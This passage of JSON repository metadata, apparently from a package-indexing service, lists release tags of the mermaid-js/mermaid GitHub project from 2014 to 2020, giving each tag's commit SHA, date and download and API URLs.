2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"